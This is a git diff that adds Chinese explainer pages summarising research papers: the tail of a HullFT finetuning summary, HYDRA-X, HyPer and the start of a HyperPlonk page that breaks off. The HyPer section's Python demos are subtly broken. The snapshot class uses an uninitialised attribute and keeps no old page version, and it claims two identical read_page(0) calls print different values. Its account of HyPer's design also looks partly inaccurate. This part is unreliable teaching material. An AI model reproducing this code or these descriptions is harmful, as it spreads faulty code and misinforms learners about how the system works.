\mathcal{L}(\theta_t; s_j) & t \bmod r = 0 \\ +\tilde{g}_{t-1} & \text{otherwise} +\end{cases} +\qquad +\theta_{t+1} = \text{AdamStep}(\theta_t, \tilde{g}_t, \eta) +$$ + +前向–反向次数从 $N$ 降到约 $\lceil N/r \rceil$。默认 $r=2$,实验显示平均 **1.48×** 微调加速,BPB 仅损失约 **0.64%**。 + +**关键实现细节**:同一文本的 $c_j$ 次更新必须**连续排列**,整数化按 multiplicity upfront 固定顺序,满足此结构。 + +### 5. 完整管线(图 1) + +``` +Query q + → FAISS 检索 K=200 候选 + → Frank–Wolfe 得稀疏 w + → Integerize 得 (S, c),共 N 条 + → 在 multiset 上 Adam 微调(梯度复用) + → 用微调后模型评估 q +``` + +--- + +## 实验结果速览 + +- **数据**:The Pile 的 12 个子集;GPT-2;150 条测试 query;共享 $K=200$ 候选池。 +- **基线**:kNN(top-$N$ 邻居)、SIFT(信息论去冗余选择)。 +- **指标**:BPB% 相对未微调基线;横轴为**总耗时**(选择 + 微调),扫 $N \in [1,50]$。 + +主要结论: + +| 预算 $T$ | HullFT vs 最强基线 | +|----------|-------------------| +| 0.75s | BPB 低 **6.4%** | +| 1.75s | 低 **3.8%**(12 子集中 11 个赢) | +| 2.0s | 低 **3.4%** | +| $\lesssim 4.5s$ | Pareto 占优 | + +机制拆解:选择阶段比 SIFT 快 **8.8×**($N=50$ 时 0.059s vs 0.524s);梯度复用再省 **1.48×** 微调时间——同一墙钟内 HullFT 能跑到更大的有效 $N$。 + +--- + +## 代码示例 1:Frank–Wolfe 凸重建(教学简化版) + +下面用 NumPy 实现论文 Alg. 3 的核心循环,帮助理解「残差方向选顶点 + 线搜索」: + +```python +import numpy as np + +def frank_wolfe_select(q, P, eps=1e-3, m=20): + """ + q: (d,) 查询 embedding + P: (d, K) 候选池,每列一个 p_i + 返回: w 在概率单纯形上,稀疏支撑 <= m + """ + K = P.shape[1] + # 从与 q 内积最大的顶点出发 + v_star = int(np.argmax(P.T @ q)) + w = np.zeros(K) + w[v_star] = 1.0 + + for _ in range(m - 1): + residual = q - P @ w + if np.dot(residual, residual) <= eps: + break + # 残差方向内积最大的候选 + v = int(np.argmax(P.T @ residual)) + # 沿 w -> e_v 的精确线搜索(二次目标闭式解) + d = np.zeros(K) + d[v] = 1.0 + d -= w # 方向 e_v - w + Pd = P @ d + num = np.dot(residual, Pd) + den = np.dot(Pd, Pd) + 1e-12 + gamma = np.clip(num / den, 0.0, 1.0) + w = (1 - gamma) * w + w[v] += gamma + return w + +# 玩具例子:2D 平面里用 3 个候选重建 query +q = np.array([0.6, 0.5]) +P = np.array([ + [1.0, 0.2, 0.0], # p1: 偏右 + [0.0, 0.8, 1.0], # p2,p3: 偏上 +]).T # shape (2, 3) + +w = frank_wolfe_select(q, P, eps=1e-4, m=5) +support = np.where(w > 1e-9)[0] +print("权重 w:", np.round(w, 3)) +print("支撑索引:", support.tolist()) +print("重建误差:", np.linalg.norm(q - P @ w)) +``` + +运行后你会看到 $w$ 只有少量非零项,且 $P@w$ 接近 $q$——这就是「稀疏、相关、多样」的几何选集。 + +--- + +## 代码示例 2:整数化 + 梯度复用微调循环 + +第二个例子演示 Alg. 1 的 floor + greedy fill,以及 $r=2$ 的梯度刷新策略(伪 PyTorch): + +```python +import numpy as np + +def integerize(q, support_vecs, frac_weights, N, swap_passes=2): + """ + support_vecs: (|S|, d) 支撑点矩阵 + frac_weights: (|S|,) FW 输出的正权重(已归一化到支撑上) + 返回 counts: (|S|,) 整数,sum = N + """ + S = len(frac_weights) + counts = np.floor(N * frac_weights).astype(int) + + def recon_error(c): + mean = (support_vecs.T @ c) / N # (d,) + return np.sum((q - mean) ** 2) + + # Greedy fill 剩余名额 + while counts.sum() < N: + best_j, best_err = 0, float("inf") + for j in range(S): + trial = counts.copy() + trial[j] += 1 + err = recon_error(trial) + if err < best_err: + best_err, best_j = err, j + counts[best_j] += 1 + + # Local swap refinement + for _ in range(swap_passes): + improved = False + for j in range(S): + for k in range(S): + if j == k or counts[j] == 0: + continue + trial = counts.copy() + trial[j] -= 1 + trial[k] += 1 + if recon_error(trial) < recon_error(counts): + counts = trial + improved = True + if not improved: + break + return counts + +def finetune_with_gradient_reuse(model, sequences, counts, lr=5e-5, r=2): + """ + sequences: 与 counts 一一对应的唯一文本列表 + 每个 s_j 连续训练 counts[j] 步,每 r 步刷新梯度 + """ + cached_grad = None + step_in_block = 0 + for seq, cj in zip(sequences, counts): + for t in range(cj): + if t % r == 0: + loss = model.compute_loss(seq) + cached_grad = model.backward(loss) + # 复用 cached_grad 做 Adam 步(论文用 AdamStep) + model.optimizer_step(cached_grad, lr) + return model + +# 演示整数化 +q = np.array([1.0, 0.0]) +support = np.array([[1.0, 0.0], [0.0, 1.0], [0.7, 0.3]]) +w_frac = np.array([0.55, 0.30, 0.15]) +N = 10 +counts = integerize(q, support, w_frac, N) +print("整数计数:", counts, "总和:", counts.sum()) +# 可能输出类似 [6, 3, 1]:重复多的条目微调时可梯度复用 +``` + +官方实现见 [alaa-khamis/HullFT](https://github.com/alaa-khamis/HullFT):`hullft/` 包提供 runtime 选择器与微调,`data/` 负责 FAISS 预计算候选池。 + +--- + +## 与相关工作的关系 + +| 方法 | 选择策略 | 微调 | 主要代价 | +|------|---------|------|---------| +| kNN TTFT | top-$N$ 最近邻 | 每样本一步 | 冗余高 | +| SIFT | 信息增益 − 冗余惩罚 | 每样本一步 | 选择慢 | +| RAG | 检索进 context | 不更新权重 | 上下文长度受限 | +| MMR / DPP | 显式多样性 | — | 非 query 条件凸优化 | +| **HullFT** | Frank–Wolfe 凸重建 | 梯度复用 | 需 embedding + 预计算池 | + +HullFT 把**主动学习 / coreset** 里的 Frank–Wolfe 思想推进到**每条 query 的推理时选集**,并用整数化连接「连续几何解」与「离散训练 multiset」。 + +--- + +## 优势、局限与何时值得用 + +### 优势 + +1. **理论接地**:近似 Carathéodory + FW,稀疏性与多样性有几何解释。 +2. **选择快**:每轮 FW 只需矩阵–向量内积,无 SIFT 式重优化。 +3. **微调快**:整数 multiset 自带重复 → 梯度缓存,$r=2$ 几乎无损。 +4. **延迟敏感场景强**:$T \lesssim 4s$ 时相对 kNN/SIFT 全面占优。 + +### 局限 + +1. **依赖 embedding 质量**:RoBERTa 向量若与下游损失不对齐,凸重建会偏。 +2. **需预计算基础设施**:FAISS 索引、候选池 JSON/NPZ(论文实验设置)。 +3. **梯度复用是近似**:$r$ 过大(如 3)会损 BPB;仅适用于短步、同序列连续块。 +4. **模型规模实验集中在 GPT-2**:更大模型、更强基线上的外推需更多验证。 + +### 实践 checklist + +- [ ] 为语料建 FAISS + 固定 $K$ 候选池预计算 +- [ ] 调 $m$(支撑上限)、$\varepsilon$(FW 精度)、$N$(微调条数) +- [ ] 整数化后检查 multiset 重复率——重复少时梯度复用收益有限 +- [ ] 默认 $r=2$;在总延迟预算下扫 $N$ 找最优 BPB–时间折中 + +--- + +## 一句话总结 + +**HullFT 把「为当前 prompt 挑训练数据」变成 embedding 空间里的稀疏凸重建(Frank–Wolfe),再把分数权重整数化成可训练的 $N$ 条 multiset,并对重复样本缓存梯度——在测试时微调场景里同时加速「选题」和「刷题」,于紧延迟预算下显著降低 BPB。** + +--- + +## 参考资料 + +- 论文:[Efficient Test-Time Finetuning of LLMs via Convex Reconstruction and Gradient Caching](https://arxiv.org/abs/2605.30337)(Khamis & Maalouf, 2026) +- 代码:[https://github.com/alaa-khamis/HullFT](https://github.com/alaa-khamis/HullFT) +- 基线 TTFT:Sun et al. nearest-neighbor test-time training;SIFT 信息论选择(同系列工作) +- 理论背景:Carathéodory 定理、Frank–Wolfe / conditional gradient、coreset 几何摘要 diff --git a/src/content/docs/papers/hydra-x.md b/src/content/docs/papers/hydra-x.md new file mode 100644 index 000000000..25d28eb22 --- /dev/null +++ b/src/content/docs/papers/hydra-x.md @@ -0,0 +1,182 @@ +--- +title: HYDRA-X: Native Unified Multimodal Models with Holistic Visual Tokenizers +来源: 'https://arxiv.org/abs/2606.13289' +日期: 2026-06-13 +分类: 机器学习 +子分类: ai-ml-models +provenance: pipeline-v3 +--- + +## 是什么 + +**HYDRA-X**(论文全称:*HYDRA-X: Native Unified Multimodal Models with Holistic Visual Tokenizers*)是腾讯混元团队在 2026 年 6 月提出的一种**统一多模态模型(UMM)**。它最大的突破是:用**同一个 Vision Transformer(ViT)编码器**同时处理**图片**和**视频**的编码,而不需要像以前那样分别用两套不同的编码器。 + +日常类比:以前的多模态模型像一个"图片翻译员 + 视频翻译员"两个人分工工作,他们说的语言不一样,后面的"大脑"(LLM)要分别学两套翻译规则。HYDRA-X 做了一个"全能翻译员",一个人同时会翻译图片和视频,语言统一了,后面的大脑学起来更省力。 + +## 背景:为什么要做这个 + +在 HYDRA-X 之前,统一多模态模型有两大主流做法: + +1. **解耦方案**:图片走一套编码器(ViT + VAE),视频走另一套编码器(3D 卷积 VAE)。问题在于两套编码器的表示空间不一致,LLM 要花大量精力去"对齐"它们。 +2. **帧级拼接方案**:对视频的每一帧独立地用图片编码器编码,然后拼在一起。问题在于帧与帧之间的运动、因果关系完全丢失了——就像看连环画时只看了单张,没注意到故事线。 + +HYDRA-X 的思路是:用一个**统一的 ViT 编码器**同时处理图片和视频,在编码器内部就引入**时间因果注意力机制**来捕捉视频中的帧间关系。 + +## 核心概念 + +### 1. Hydra-XTok:统一视觉 Tokenizer + +HYDRA-X 的核心是 **Hydra-XTok**,一个统一的视觉 token 编码器。它的工作流程如下: + +``` +输入(图片/视频) + → Gen-ViT(结构编码器,提取视觉结构特征 h) + → Bottleneck(压缩成紧凑潜码 z) + → Sem-ViT(语义编码器,生成语义特征 s) + → LLM(统一处理) +``` + +关键设计: + +- **Gen-ViT**:负责"看得准",把像素压缩成紧凑的生成潜码(latent),用于图像/视频生成 +- **Bottleneck**:在生成和语义之间搭一个"瓶颈层",压缩信息的维度 +- **Sem-ViT**:负责"看得懂",把潜码展开成高维语义特征,对齐预训练的语义教师模型 + +### 2. 帧级因果注意力(Tubelet Attention) + +论文做了一个**反直觉的发现**:很多人认为视频处理应该用"全时空注意力"(每帧都跟所有帧交互),但实验表明这反而**降低了重建质量**。 + +HYDRA-X 的做法是: + +- 每帧只跟**前一帧**交互(因果注意力,且视野只有 2 帧) +- 这种"少看一点"的设计,反而比"全部看完"效果更好 + +类比:你看短视频时,不需要同时记住所有帧才能理解当前画面。看到"前一个动作 + 当前动作"就足以理解连贯性了。 + +### 3. 分层时间压缩(Hierarchical Patchify) + +对视频进行时间压缩时,HYDRA-X 不用一步到位(4 倍压缩),而是分两步走(每步 2 倍压缩,共 4 倍): + +``` +原始帧序列: [F1, F2, F3, F4, F5, F6, F7, F8] +一步压缩(4x): [C1, C5] ← 信息丢失大 +分层压缩(2x→2x): [C1, C3] → [C1] ← 渐进式,保留更多信息 +``` + +### 4. 分解器(Decompressor) + +视频被压缩后,语义教师模型没法直接在压缩的时序上做监督(因为教师模型是在原始帧率下训练的)。HYDRA-X 加了一个轻量的**分解器**,把压缩后的特征"展开"回原始帧率,再用图像和**视频**两个教师模型分别做蒸馏。 + +### 5. Tokenizer 级源-目标交互(Tokenizer-Stage STI) + +在做**图片编辑**任务时(比如"把这张照片里的猫换成狗"),以前的做法是:源图片和目标图片**独立编码**,然后在 LLM 层面才做交互。HYDRA-X 改为:在 Tokenizer 内部就把源图片和目标图片当作一个"长度为 2 的序列"一起编码,让它们在**潜码层面**就发生交互。 + +## 代码示例 + +### 示例 1:Token 编码流程 + +下面展示 Hydra-XTok 对图片和视频的编码方式(伪代码,帮助理解数据流): + +```python +# 输入:一张图片 或 一个视频片段(多帧) +# 输出:紧凑的语义特征,喂给 LLM + +class HydraXTok(nn.Module): + def __init__(self): + self.gen_vit = SigLIP_ViT() # 结构编码器 + self.bottleneck = ProjectionLayer() # 生成-语义瓶颈 + self.sem_vit = SigLIP_ViT() # 语义编码器 + self.decompressor = TemporalUpsampler() # 分解器(训练时用) + + def forward(self, x, is_video=False): + """ + x: 输入图像 (B, C, H, W) 或视频 (B, T, C, H, W) + is_video: 标记是否是视频 + """ + # Step 1: Gen-ViT 提取结构特征 + if is_video: + # 视频:分层时间压缩(2x → 2x) + h = self.gen_vit.hierarchical_temporal_patchify(x) + else: + # 图片:直接编码 + h = self.gen_vit(x) + + # Step 2: Bottleneck 压缩成潜码 + z = self.bottleneck(h) + + # Step 3: Sem-ViT 生成语义特征 + # 视频编辑时,源图和目的图一起做 + s = self.sem_vit(z) + + return s # 语义特征,输入 LLM +``` + +**关键点**:无论是图片还是视频,最终都输出同一种格式的语义特征 `s`,LLM 不需要知道输入是图片还是视频。 + +### 示例 2:训练损失函数 + +HYDRA-X 的训练包含两大部分:tokenizer 训练损失和 UMM 训练损失。 + +```python +# Tokenizer 训练损失 = 重建损失 + 语义蒸馏损失 +# 目标:潜码既要"重建出原图"(生成能力),又要"语义上对齐教师模型"(理解能力) + +L_HydraXTok = L_rec + λ * L_dist + +# L_rec: 从潜码 z 重建像素,确保生成质量 +# L_dist: 语义蒸馏,分两步: +# 1) Sem-ViT 输出 vs 图像教师(SigLIP) +# 2) 分解器输出 vs 视频教师(InternVideo) + +L_dist = d_cos(s_image, T_img(x)) # 图像教师蒸馏 + + d_cos(D(s_video), T_vid(x)) # 视频教师蒸馏(通过分解器) + +# UMM 总训练损失 = 文本生成 + 视觉生成 +L_HydraX = λ1 * L_NTP + λ2 * L_FM + +# L_NTP: Next Token Prediction(文本生成,标准 LLM 训练) +# L_FM: Flow Matching(视觉生成,从潜码重建图像/视频) +``` + +这里的 `d_cos` 是余弦距离(cosine distance),衡量语义特征的对齐程度。 + +## 为什么重要 + +不理解 HYDRA-X,以下趋势就没法解释: + +- **统一多模态模型的下一个方向是"原生视频支持"**——不再是在图片模型上加个视频补丁,而是从架构设计之初就同时考虑图片和视频 +- **Tokenizer 不只是"翻译器",它是理解与生成之间的桥梁**——HYDRA-X 通过蒸馏把语义知识注入生成潜码,让生成和理解互相促进 +- **"少即是多"在视频建模中是真实存在的**——全时空注意力虽然直观,但在结构化重建任务上反而有害;局部因果注意力就足够 +- **图片编辑的一致性瓶颈在编码层,不在 LLM 层**——源-目标交互前置到 Tokenizer 内部,是编辑质量大幅提升的关键 + +## 关键数据 + +HYDRA-X(7B 参数,基于 Qwen2.5-7B-Instruct)在主要基准上的表现: + +| 任务 | 基准 | HYDRA-X | 说明 | +|------|------|---------|------| +| 图像理解 | AI2D | **86.5** | 超过多数 14B+ 模型 | +| 图像理解 | MME | **2350.0** | 接近专有模型水平 | +| 视频理解 | MVBench | **59.1** | 超过 Show-o2 7B | +| 视频理解 | Video-MME | **60.0** | 同量级最佳之一 | +| 图像生成 | GenEval | **71.97** | 统一模型中最强 | +| 图像编辑 | ImgEdit | **3.20** | STI 比 Indep 高 0.4 | +| 图像重建 | ImageNet PSNR | **31.73** | 超过 3D-Conv VAE | + +## 局限 + +论文在附录 E 中也坦诚了局限: + +- HYDRA-X 在**长视频理解**上仍落后于专门训练的视频模型(如 Gemini-1.5-Pro),说明统一模型在长程时序建模上还有提升空间 +- 模型规模限于 7B,更大规模(如 70B)的表现和扩展规律尚待验证 +- 训练需要双教师蒸馏(图像+视频),增加了训练基础设施的复杂度 + +## 总结 + +HYDRA-X 的核心贡献可以用三句话概括: + +1. **统一**:第一个用单个 ViT 统一处理图片和视频的 Tokenizer +2. **发现**:"帧级因果注意力 + 分层压缩"比全时空注意力+一步压缩效果更好 +3. **改进**:图片编辑中源-目标交互前置到 Tokenizer 潜码层,大幅提升一致性 + +它标志着统一多模态模型从"图片优先"向"图片+视频原生统一"的重要演进。 diff --git a/src/content/docs/papers/hyper-kemper-neumann-2011.md b/src/content/docs/papers/hyper-kemper-neumann-2011.md new file mode 100644 index 000000000..f597fc570 --- /dev/null +++ b/src/content/docs/papers/hyper-kemper-neumann-2011.md @@ -0,0 +1,298 @@ +--- +title: HyPer - A Hybrid OLTP and OLAP Main Memory DBMS +来源: https://db.in.tum.de/~kemper/papers/HyperICDE11.pdf +日期: 2026-06-13 +分类: 数据库 +子分类: 存储与查询 +provenance: pipeline-v3 +--- + +# HyPer:一个混合 OLTP 与 OLAP 的内存数据库 + +## 一、为什么要同时做 OLTP 和 OLAP? + +想象一家电商公司。它的网站每天收到百万次请求——用户下单、查库存、付款,这些操作要求**极快响应**(毫秒级),每次只改动几条记录。这就是 OLTP(联机事务处理)。 + +同一时间,运营团队需要知道"上个月哪个地区的销售额最高"、"哪些商品经常一起被购买",这类查询要扫描**整张表甚至多张大表**,做复杂的聚合和连接。这就是 OLAP(联机分析处理)。 + +在传统架构里,这两件事是分开的: + +- OLTP 数据放在 MySQL / PostgreSQL 这类关系型数据库里 +- 分析数据通过 ETL 定时同步到 Hive / ClickHouse 等分析引擎 + +中间隔着数据管道、延迟、不一致。HyPer 的核心思想就一句话:**同一份数据,同一个引擎,同时服务 OLTP 和 OLAP。** + +## 二、核心概念拆解 + +### 2.1 列存 vs 行存:各有所长 + +在理解 HyPer 之前,必须先搞懂一个根本矛盾: + +**行存储(Row Store)**——像一张 Excel 表格,一行一条记录完整地放在一起。 + +``` +订单表(行存): +| 订单ID | 用户ID | 金额 | 时间 | +|--------|--------|-------|-------------| +| 1001 | U1 | 299元 | 2024-01-01 | +| 1002 | U2 | 159元 | 2024-01-01 | +| 1003 | U1 | 499元 | 2024-01-02 | +``` + +适合 OLTP:你要改一条记录、查一条记录的某个字段,一行数据在内存里连续存放,CPU 缓存友好。 + +**列存储(Column Store)**——把每一列单独存。 + +``` +订单表(列存): +订单ID列: [1001, 1002, 1003] +用户ID列: [U1, U2, U1 ] +金额列: [299元, 159元, 499元 ] +时间列: [01-01, 01-01, 01-02 ] +``` + +适合 OLAP:你只需要"统计金额总和",只需要读金额这一列,不用碰其他列,省了大量 IO。 + +**问题**:行存分析慢,列存更新慢。业界共识是"鱼与熊掌不可兼得"。 + +**HyPer 的答案**:两种格式**同时存在**,在运行时自动转换。 + +### 2.2 虚拟内存快照(Virtual Memory Snapshots)——HyPer 的杀手锏 + +这是这篇论文最核心的创新。 + +传统数据库做快照需要拷贝整个数据集,很慢。HyPer 利用操作系统的虚拟内存机制,几乎零成本地创建数据库快照: + +**类比**:想象你在读一本很厚的书,突然需要停下来给别人展示"当前这本书的样子"。传统做法是把整本书复印一份。HyPer 的做法是给这本书打个标记:"从这一刻起,这本书的内容不再改变",然后给读者发一本"只读副本"的钥匙。因为操作系统负责追踪哪些页面被改写了(写时复制,Copy-on-Write),所以不需要预先拷贝任何东西。 + +具体实现: + +1. 数据库的数据页映射到进程的虚拟地址空间 +2. 当需要快照时,把相关页面的权限改为只读 +3. 如果 OLTP 事务要修改某个页面,操作系统触发缺页中断,HyPer 捕获它,把那一页拷贝一份再修改 +4. 快照里的数据保持不变,供分析查询使用 + +这个过程在**微秒级别**完成,而不是传统数据库的秒级甚至分钟级。 + +### 2.3 运行时转换(Runtime Conversion) + +HyPer 的行存和列存之间可以互相转换: + +- OLTP 事务主要在**行存**上执行(更新方便) +- OLAP 查询主要在**列存**上执行(扫描高效) +- 当有大量分析查询进来时,HyPer 在后台把行存**转换成列存** +- 转换过程中 OLTP 不受影响,继续在工作 + +转换完成后,分析查询切换到列存引擎执行。如果 OLTP 又变多了,可以再转回去。 + +### 2.4 自适应并发控制 + +HyPer 使用了一种叫 **Optimistic Concurrency Control(乐观并发控制)** 的策略: + +- 事务执行时不加锁(假设不会冲突) +- 提交时才检查是否有冲突 +- 有冲突就回滚重试 + +配合虚拟内存快照,不同版本的数据可以同时存在,互不干扰。 + +## 三、系统架构图(文字版) + +``` + ┌─────────────────────────────┐ + │ SQL Parser │ + └──────────┬──────────────────┘ + │ + ┌────────────────┼────────────────┐ + ▼ ▼ ▼ + ┌──────────┐ ┌──────────┐ ┌─────────────────┐ + │ OLTP │ │ OLAP │ │ Snapshot Engine │ + │ Planner │ │ Planner │ │ (VM Snapshots) │ + └────┬─────┘ └────┬─────┘ └────────┬────────┘ + │ │ │ + ▼ ▼ ▼ + ┌──────────┐ ┌──────────┐ ┌──────────────────┐ + │ Row Store│ │Col Store │ │ Copy-on-Write │ + │ Engine │◄─►│ Engine │ │ Page Manager │ + └──────────┘ └──────────┘ └──────────────────┘ +``` + +## 四、代码示例 + +### 示例 1:模拟虚拟内存快照的简易实现 + +下面用一个简化的 Python 代码演示 HyPer 快照的核心思想——写时复制: + +```python +import copy + +class VirtualMemorySnapshot: + """ + 简化版的 HyPer 虚拟内存快照机制。 + 核心思路:快照创建时不拷贝数据,只在写入时才拷贝被修改的页面。 + """ + + def __init__(self, num_pages=10): + # 每个页面 4KB,模拟数据库的内存页 + self.pages = [bytearray(4096) for _ in range(num_pages)] + # 记录每个页面是否已被复制(写时复制) + self.copy_on_write_flags = [False] * num_pages + + def create_snapshot(self): + """ + 创建快照:把所有页面设为只读,记录版本号。 + 实际成本:O(1),只是设个标志位。 + """ + snapshot_version = len(self.snapshots) + self.snapshots.append(snapshot_version) + for i in range(len(self.pages)): + self.copy_on_write_flags[i] = True # 标记为只读 + return f"Snapshot v{snapshot_version} created" + + def modify_page(self, page_id, offset, data): + """ + 修改页面:如果该页面处于"只读"状态(有快照), + 先拷贝一份新的再修改。 + """ + if self.copy_on_write_flags[page_id]: + # 写时复制:创建新页面副本 + self.pages[page_id] = bytearray(self.pages[page_id]) + self.copy_on_write_flags[page_id] = False + + self.pages[page_id][offset:offset + len(data)] = data + + def read_page(self, page_id): + return self.pages[page_id] + + +# 演示 +db = VirtualMemorySnapshot(num_pages=3) + +# 写入初始数据 +db.modify_page(0, 0, b"ORDER_ID=1001") +db.modify_page(1, 0, b"USER_ID=U1") +db.modify_page(2, 0, b"AMOUNT=299") + +# 创建一个快照(相当于开启一个分析查询的视角) +print(db.create_snapshot()) # Snapshot v0 created + +# OLTP 事务继续修改数据 +db.modify_page(0, 0, b"ORDER_ID=1002") +db.modify_page(1, 0, b"USER_ID=U2") + +# 快照中的数据不变,分析查询看到的是旧数据 +print(db.read_page(0)[:15]) # b"ORDER_ID=1001" -- 快照视角 +print(db.read_page(0)[:15]) # b"ORDER_ID=1002" -- 最新数据 +``` + +### 示例 2:行存到列存的转换 + +这个示例演示 HyPer 如何在运行时把行存格式转换为列存格式: + +```python +class RowColumnConverter: + """ + 简化版:演示 HyPer 的行存 <-> 列存运行时转换。 + 实际 HyPer 的转换是增量式的,只转换脏页,且不影响正在执行的事务。 + """ + + def __init__(self): + # 行存格式:每条记录是一个字典 + self.row_store = [] + + def insert(self, order_id, user_id, amount): + """OLTP 插入操作——在行存中追加一条记录""" + self.row_store.append({ + "order_id": order_id, + "user_id": user_id, + "amount": amount + }) + + def convert_to_columnar(self): + """ + 将行存转换为列存。 + 转换后,OLAP 查询可以直接访问某一列而不需要遍历整条记录。 + """ + if not self.row_store: + return {} + + columns = { + "order_id": [], + "user_id": [], + "amount": [] + } + for row in self.row_store: + for col in columns: + columns[col].append(row[col]) + return columns + + def aggregate_sum(self, column_name): + """ + OLAP 聚合查询:计算某一列的总和。 + 在列存上,这只需要扫描一个数组。 + """ + col_data = self.columnar_data.get(column_name, []) + return sum(col_data) + + def set_columnar(self, columns): + self.columnar_data = columns + + +# 演示 +converter = RowColumnConverter() + +# OLTP:大量插入操作 +for i in range(1, 6): + converter.insert(i, f"U{i}", i * 100) + +print("行存数据:", converter.row_store) +# [{'order_id': 1, 'user_id': 'U1', 'amount': 100}, ...] + +# 切换:行存 → 列存(HyPer 在后台做这件事) +columns = converter.convert_to_columnar() +converter.set_columnar(columns) + +print("列存数据:", columns) +# {'order_id': [1,2,3,4,5], 'user_id': ['U1','U2','U3','U4','U5'], 'amount': [100,200,300,400,500]} + +# OLAP:聚合查询——只扫描 amount 这一列 +total = converter.aggregate_sum("amount") +print(f"总金额: {total}") # 1500 +``` + +## 五、性能对比(来自论文实验) + +HyPer 在论文中展示了几个关键数据: + +- **OLTP 性能**:与纯行存数据库(如 VoltDB)相当 +- **OLAP 性能**:与纯列存数据库(如 MonetDB)相当 +- **混合负载**:同时运行 OLTP + OLAP 时,性能下降远小于传统方案(传统方案中 OLTP 会因为 ETL 管道和分析查询而严重退化) + +论文使用的 CH-benCHmark(混合基准测试)显示,在 OLTP:OLAP = 9:1 的混合负载下,HyPer 的总体吞吐量比分别部署两个系统还要高。 + +## 六、为什么这篇论文值得读(十年后) + +这篇 2011 年的论文获得了 ICDE 2021 的**十年影响力论文奖**,原因如下: + +1. **打破了行业共识**:当时普遍认为 OLTP 和 OLAP 必须分开,HyPer 用实验证明可以合一 +2. **虚拟内存快照**这个想法极其优雅——不发明新算法,而是巧妙利用操作系统已有的机制 +3. **启发了后续大量工作**:Google Spanner、Microsoft Hekaton、Snowflake 等现代数据库都在不同程度上吸收了类似思想 +4. **工程上的勇气**:论文中的系统是完全可工作的原型,不是纸上谈兵 + +## 七、延伸思考 + +- HyPer 的方案依赖于 x86 的虚拟内存机制(写时复制),这在 ARM 或其他架构上是否需要调整? +- 现代数据库如 DuckDB、ClickHouse 也支持一定的 OLTP 能力,它们的方案和 HyPer 有什么异同? +- 云原生时代,存算分离架构下,"混合数据库"这个问题是否有了新的解法? + +## 八、关键术语表 + +| 术语 | 英文 | 简单解释 | +|------|------|----------| +| OLTP | Online Transaction Processing | 短事务、高并发、低延迟的操作(如下单) | +| OLAP | Online Analytical Processing | 长查询、大批量、复杂分析(如报表) | +| 行存储 | Row Store | 按行组织数据,适合点查询和更新 | +| 列存储 | Column Store | 按列组织数据,适合聚合和扫描 | +| 写时复制 | Copy-on-Write | 延迟拷贝,只在真正写入时才复制数据 | +| 虚拟内存快照 | VM Snapshot | 利用操作系统虚拟内存机制创建的一致性快照 | +| 乐观并发控制 | OCC | 执行时不加锁,提交时检查冲突 | +| 运行时转换 | Runtime Conversion | 在程序运行时动态改变数据的内部表示 | diff --git a/src/content/docs/papers/hyperplonk-2022.md b/src/content/docs/papers/hyperplonk-2022.md new file mode 100644 index 000000000..8a104d84b --- /dev/null +++ b/src/content/docs/papers/hyperplonk-2022.md @@ -0,0 +1,336 @@ +--- +title: HyperPlonk: PLONK with Linear-time Prover and High-degree Custom Gates +来源: https://eprint.iacr.org/2022/1355 +日期: 2026-06-13 +分类: 安全与隐私 +子分类: 密码与零知识 +provenance: pipeline-v3 +--- + +# HyperPlonk:线性时间证明者与高阶自定义门 + +## 什么是零知识证明? + +先从一个日常类比开始。 + +想象你在厨房里做了一道菜。朋友不希望你直接把配方给他,但他想确认你确实做了一道符合规则的菜——用了正确的食材、正确的步骤。 + +零知识证明(ZKP)就是:你能向朋友证明"我做的菜是合法的",而不透露任何配方的细节。 + +在区块链技术中,零知识证明最常见的用途是:**证明一笔交易有效,但不公开交易金额、发送方和接收方。** + +## PLONK 是什么? + +PLONK 是一种零知识证明系统,由 2019 年的一组研究者提出。你可以把它想象成一种"万能证明模板"——无论你证明什么计算(转账、智能合约执行、加密运算),都用同一套模板来生成证明。 + +PLONK 有两个核心组件: + +1. **电路(Circuit)**:把你要证明的计算拆成一个个小步骤,每步就是一个"门"(gate),就像乐高积木。 +2. **多项式承诺(Polynomial Commitment)**:把电路的值打包成多项式,像把乐高说明书折起来放进一个密封信封,别人能验证信封没被动过,但看不到里面的内容。 + +### PLONK 的问题:FFT 瓶颈 + +PLONK 在生成证明时,需要用到一种叫 **FFT(快速傅里叶变换)** 的数学工具。FFT 的复杂度是 O(n log n),其中 n 是电路的大小。 + +当电路变大(比如以太坊的每笔交易涉及几十个操作),FFT 就成了瓶颈——就像你有一台打印机,但每次打印前都要先花大量时间预热机器。 + +HyperPlonk 就是为了解决这个问题而诞生的。 + +## HyperPlonk 的核心改进 + +HyperPlonk 由 Binyi Chen、Benedikt Bünz、Dan Boneh、Zhenfei Zhang 于 2022 年提出,发表于 EUROCRYPT 2023。它做了两件关键的事: + +### 改进一:去掉 FFT,实现线性时间证明者 + +HyperPlonk 把计算从"整个域"搬到了 **布尔超立方体(Boolean Hypercube)** 上。 + +布尔超立方体是什么?想象一个 n 维的立方体,每个顶点代表一组 n 位二进制数。比如 3 维超立方体有 8 个顶点:(0,0,0)、(0,0,1)、(0,1,0)、...、(1,1,1)。 + +在传统 PLONK 中,多项式是在整个有限域上操作的,需要 FFT。HyperPlonk 则只在布尔超立方体上操作多项式,用 **多线性多项式(Multilinear Polynomial)** 来替代。 + +多线性多项式长什么样?它是一个多项式,每个变量最多出现一次: + +``` +f(x, y, z) = a + b·x + c·y + d·z + e·x·y + f·y·z + g·x·z + h·x·y·z +``` + +注意:没有 x²、y³ 这样的项——每个变量的最高次数是 1。这就是"多线性"的含义。 + +在布尔超立方体上,x、y、z 只能取 0 或 1,所以 x² = x,y³ = y,天然满足多线性。 + +**结果:证明者的工作量从 O(n log n) 降到了 O(n),也就是真正的线性时间。** + +### 改进二:支持更高阶的自定义门 + +传统 PLONK 中,每个自定义门的多项式度数受到限制。如果你的门需要计算 x³ + y²,这个门的度数就变高了,PLONK 的处理效率会下降。 + +HyperPlonk **没有这个限制**。它支持高阶自定义门,同时证明者的运行时间不变。这对于需要复杂运算的场景(比如 zkEVM,即零知识以太坊虚拟机)非常重要。 + +## 核心概念详解 + +### 概念一:多线性多项式承诺(MLPC) + +在传统 PLONK 中,证明者对每个多项式做 FFT,然后给出承诺(commitment)。在 HyperPlonk 中,承诺是在多线性多项式上做的。 + +最常用的是 **KZG 承诺方案**(Kate-Zaverucha-Goldberg)。它的核心思想是: + +- 证明者有一个多项式 f(x) +- 证明者给出一个"承诺" C = f(s) · G(s 是秘密,G 是椭圆曲线上的生成元) +- 验证者无法从 C 反推 f(x),但可以验证 f(r) = v 这个声明 + +```python +# 伪代码:多线性多项式承诺(简化版) +from hashlib import sha256 + 